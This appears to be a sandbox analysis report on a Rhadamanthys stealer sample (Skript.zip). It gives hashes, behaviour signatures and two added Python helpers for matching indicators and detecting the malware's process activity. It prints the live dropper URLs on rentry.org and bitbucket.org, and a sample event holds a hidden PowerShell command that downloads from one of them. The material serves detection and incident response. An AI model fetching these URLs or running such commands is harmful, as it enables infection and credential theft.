General

  • Target

    Skript.zip

  • Size

    1.5MB

  • Sample

    240622-1d2rtavdpg

  • MD5

    986fd66f8c320eebe167f8a9521314a8

  • SHA1

    9e3667ba7755e4db66f99586556f75697ad3a17e

  • SHA256

    a7edd49ec36552504d0b7940037e79de8f9918e0271ba96bad47076cb24f7ee1

  • SHA512

    808eade52347e0c52b43e44934cb793d7310de773bfc5e3e3aea3164c99e33fc30af2c55b98471324cc6f1c5c107eb0995637e14700b1361a422befe63beea09

  • SSDEEP

    49152:yDfI3cSHjRIA9pX8wgibL6Jt1xH6tUhhCF:yDfRyb52JjxH2F

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

https://rentry.org/lem61111111111/raw

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://bitbucket.org/k34gk349g34g3/56j56j5j56j/raw/0f83a68fcbec53d90c5d0c17a582d7652b840e57/lemon.rar
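The two-stage download chain above (a PowerShell dropper fetched from rentry.org, which in turn pulls lemon.rar from bitbucket.org) and the hashes in this report are the indicators a responder will actually reuse. The following triage helper is an added example, not part of the sandbox report or of the sample: the hash values and URLs are copied from the report, while the function names, the abused-hosting list and the input bytes in the test are assumptions. It computes file digests, matches them (or digests supplied by another tool) against the report's hashes, and defangs and classifies the dropper URLs.

```python
import hashlib
from urllib.parse import urlsplit

# Hashes copied from the report above (SHA-512 omitted for brevity).
REPORT_HASHES = {
    "Skript.zip": {
        "md5": "986fd66f8c320eebe167f8a9521314a8",
        "sha1": "9e3667ba7755e4db66f99586556f75697ad3a17e",
        "sha256": "a7edd49ec36552504d0b7940037e79de8f9918e0271ba96bad47076cb24f7ee1",
    },
    "Launcher.exe": {
        "md5": "b5e479d3926b22b59926050c29c4e761",
        "sha1": "a456cc6993d12abe6c44f2d453d7ae5da2029e24",
        "sha256": "fbc4058b92d9bc4dda2dbc64cc61d0b3f193415aad15c362a5d87c90ca1be30b",
    },
    "dxil.dll": {
        "md5": "cb72bef6ce55aa7c9e3a09bd105dca33",
        "sha1": "d48336e1c8215ccf71a758f2ff7e5913342ea229",
        "sha256": "47ffdbd85438891b7963408ea26151ba26ae1b303bbdab3a55f0f11056085893",
    },
    "mojo_core.dll": {
        "md5": "e338245ec63c4881d446e81bf2e6b9be",
        "sha1": "9ed5ff2c4bbb43a41fed37a65f5b691ddcbc63b0",
        "sha256": "c8f24b72f72aeacd060e67a76a5c71145cde5b4527b3ec87c5c4d36cae8e076e",
    },
}

# Dropper URLs copied from the extracted config above.
REPORT_URLS = {
    "ps1.dropper": "https://rentry.org/lem61111111111/raw",
    "exe.dropper": "https://bitbucket.org/k34gk349g34g3/56j56j5j56j/raw/"
                   "0f83a68fcbec53d90c5d0c17a582d7652b840e57/lemon.rar",
}

# Hosting providers the report flags as abused; assumed list, extend as needed.
ABUSED_HOSTS = {"rentry.org", "bitbucket.org"}


def digest_all(data: bytes) -> dict:
    """Compute the three digests the report lists for a blob of bytes."""
    return {algo: hashlib.new(algo, data).hexdigest() for algo in ("md5", "sha1", "sha256")}


def match_digests(digests: dict) -> list:
    """Return (artifact, algorithm) pairs for every supplied digest that equals a report hash.

    Accepts digests produced elsewhere (e.g. an EDR export), case-insensitive.
    """
    hits = []
    for artifact, known in REPORT_HASHES.items():
        for algo, value in known.items():
            if digests.get(algo, "").lower() == value:
                hits.append((artifact, algo))
    return hits


def match_bytes(data: bytes) -> list:
    """Hash the bytes and match them against the report."""
    return match_digests(digest_all(data))


def defang(url: str) -> str:
    """Make the URL safe to paste into a ticket: hxxp scheme, host dots bracketed."""
    parts = urlsplit(url)
    host = parts.hostname or ""
    scheme = {"http": "hxxp", "https": "hxxps"}.get(parts.scheme, parts.scheme)
    out = url.replace(parts.scheme + "://", scheme + "://", 1)
    return out.replace(host, host.replace(".", "[.]"), 1)


def describe_url(url: str) -> dict:
    """Summarise a dropper URL: host, whether it is abused legitimate hosting, payload name."""
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    return {
        "host": host,
        "abused_hosting": host in ABUSED_HOSTS,
        "filename": parts.path.rsplit("/", 1)[-1],
        "defanged": defang(url),
    }


if __name__ == "__main__":
    for stage, url in REPORT_URLS.items():
        print(stage, describe_url(url))
    # Constructed input, not the real sample; no hit expected.
    print(match_bytes(b"constructed bytes, not the sample"))
```

`match_digests` is the entry point for bulk checks: feed it the per-file digest dicts an EDR or `sha256sum` run produces and collect the hits, without needing the sample itself on the analysis box.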

Targets

    • Target

      Launcher.exe

    • Size

      7KB

    • MD5

      b5e479d3926b22b59926050c29c4e761

    • SHA1

      a456cc6993d12abe6c44f2d453d7ae5da2029e24

    • SHA256

      fbc4058b92d9bc4dda2dbc64cc61d0b3f193415aad15c362a5d87c90ca1be30b

    • SHA512

      09d1aa9b9d7905c37b76a6b697de9f2230219e7f51951654de73b0ad47b8bb8f93cf63aa4688a958477275853b382a2905791db9dcb186cad7f96015b2909fe8

    • SSDEEP

      192:q+yk9cqvjX3xszdzztCbxbsIcaqc2Ng5vGIcaBSNtUqOwciQjdv:Tyk9Hv1O/Cbxbbcaqc2NidcaANt/dcio

    • Rhadamanthys

      Rhadamanthys is an information stealer written in C++, first seen in August 2022.

    • Suspicious use of NtCreateProcessExOtherParentProcess

    • Suspicious use of NtCreateUserProcessOtherParentProcess

    • Blocklisted process makes network request

    • Creates new service(s)

    • Downloads MZ/PE file

    • Stops running service(s)

    • Checks computer location settings

      Looks up the country code configured in the registry, most likely to geofence execution to selected countries.

    • Executes dropped EXE

    • Loads dropped DLL

    • Enumerates connected drives

      Attempts to read the root path of hard drives other than the default C: drive.

    • Legitimate hosting services abused for malware hosting/C2

    • Power Settings

      powercfg controls every configurable power setting on a Windows system and can be abused to keep an infected host from sleeping, locking or shutting down.

    • Drops file in System32 directory

    • Suspicious use of SetThreadContext
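Several of the Launcher.exe signatures above (powercfg abuse, service creation and stopping, the registry country-code lookup, a blocklisted process reaching out to abused hosting) are visible in ordinary process-creation telemetry. The detector below is an added example, not part of the sandbox report: the event records are constructed, Sysmon-style fields, not the sample's actual trace; the `Control Panel\International\Geo` registry path is an assumed location for the country code, which the report does not name; and the rule patterns are the author's, not the sandbox's.

```python
import re
from urllib.parse import urlsplit

# Hosting providers named in the report's extracted config; assumed list.
ABUSED_HOSTS = {"rentry.org", "bitbucket.org"}
HOSTING_RULE = "Legitimate hosting services abused for malware hosting/C2"

# (report signature name, regex on Image, regex on CommandLine); both are
# applied with re.search, case-insensitively.
RULES = [
    ("Power Settings", r"\\powercfg\.exe$",
     r"(standby-timeout|monitor-timeout|hibernate-timeout|/h(ibernate)?\s+off)"),
    ("Creates new service(s)", r"\\(sc|powershell)\.exe$",
     r"(^|\s)sc(\.exe)?\s+create\b|New-Service\b"),
    ("Stops running service(s)", r"\\(sc|net1?)\.exe$",
     r"(^|\s)(sc|net1?)(\.exe)?\s+stop\b"),
    # Assumed registry location of the configured country code.
    ("Checks computer location settings", r"\\(reg|powershell)\.exe$",
     r"Control Panel\\International\\Geo"),
    ("Blocklisted process makes network request",
     r"\\(powershell|mshta|wscript|cscript|regsvr32|rundll32)\.exe$",
     r"https?://"),
]

URL_RE = re.compile(r"https?://[^\s\"'<>]+", re.I)

# Constructed process-creation records (Sysmon Event ID 1 shape), not real telemetry.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\powercfg.exe",
     "CommandLine": "powercfg /x -standby-timeout-ac 0",
     "ParentImage": r"C:\Users\user\Desktop\Launcher.exe"},
    {"Image": r"C:\Windows\System32\powercfg.exe",
     "CommandLine": "powercfg /hibernate off",
     "ParentImage": r"C:\Users\user\Desktop\Launcher.exe"},
    {"Image": r"C:\Windows\System32\sc.exe",
     "CommandLine": 'sc create "UpdateSvc" binPath= "C:\\Windows\\System32\\upd.exe"',
     "ParentImage": r"C:\Users\user\Desktop\Launcher.exe"},
    {"Image": r"C:\Windows\System32\sc.exe",
     "CommandLine": "sc stop wuauserv",
     "ParentImage": r"C:\Users\user\Desktop\Launcher.exe"},
    {"Image": r"C:\Windows\System32\reg.exe",
     "CommandLine": 'reg query "HKCU\\Control Panel\\International\\Geo" /v Nation',
     "ParentImage": r"C:\Users\user\Desktop\Launcher.exe"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell -nop -w hidden -c "iwr https://rentry.org/lem61111111111/raw"',
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe",
     "ParentImage": r"C:\Windows\explorer.exe"},
]


def match_event(event: dict) -> list:
    """Return the names of every rule the event triggers, in rule order."""
    image = event.get("Image", "")
    cmd = event.get("CommandLine", "")
    hits = [name for name, img_re, cmd_re in RULES
            if re.search(img_re, image, re.I) and re.search(cmd_re, cmd, re.I)]
    # Any URL whose host is abused legitimate hosting counts once per event.
    for url in URL_RE.findall(cmd):
        if (urlsplit(url).hostname or "").lower() in ABUSED_HOSTS:
            hits.append(HOSTING_RULE)
            break
    return hits


def scan(events: list) -> list:
    """Run every rule over every event; yields (event index, rule name) pairs."""
    return [(i, name) for i, ev in enumerate(events) for name in match_event(ev)]


def summarize(events: list) -> dict:
    """Count hits per rule, the shape a sandbox signature list presents."""
    counts = {}
    for _, name in scan(events):
        counts[name] = counts.get(name, 0) + 1
    return counts


if __name__ == "__main__":
    for idx, name in scan(SAMPLE_EVENTS):
        print(idx, name, "<-", SAMPLE_EVENTS[idx]["CommandLine"])
```

The ParentImage field is carried along because the report's NtCreateUserProcessOtherParentProcess signature means the recorded parent may be spoofed; a command-line rule cannot see that, so treat parent-based allowlisting as weak evidence when these hits appear.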

    • Target

      dxil.dll

    • Size

      1.4MB

    • MD5

      cb72bef6ce55aa7c9e3a09bd105dca33

    • SHA1

      d48336e1c8215ccf71a758f2ff7e5913342ea229

    • SHA256

      47ffdbd85438891b7963408ea26151ba26ae1b303bbdab3a55f0f11056085893

    • SHA512

      c89eebcf43196f8660eee19ca41cc60c2a00d93f4b3bf118fe7a0deccb3f831cac0db04b2f0c5590fa8d388eb1877a3706ba0d58c7a4e38507c6e64cfd6a50a0

    • SSDEEP

      24576:LCfhbh3v3mtZDiAQeWj26k41ob2nrZ1rqpegQDJqoZtp22GkmgA9u808jQPEdkr1:LCfhbh3v3mtEAQrW41obCraeRhy9ou6r

    • Score

      1/10
    • Target

      mojo_core.dll

    • Size

      1.9MB

    • MD5

      e338245ec63c4881d446e81bf2e6b9be

    • SHA1

      9ed5ff2c4bbb43a41fed37a65f5b691ddcbc63b0

    • SHA256

      c8f24b72f72aeacd060e67a76a5c71145cde5b4527b3ec87c5c4d36cae8e076e

    • SHA512

      f3768a97f646e31fd2206bc658a24e4f39f18a4a625699d700d43a27299a946840e404df78b0e0f149c9a013a7e60dd5adaf452c4a0a4db5525ad738e4c22798

    • SSDEEP

      49152:XN5EwqPeGTxMdbqDb0fmKMEYcwYj75Bvaw:PIabqDEMEd

    • Score

      1/10
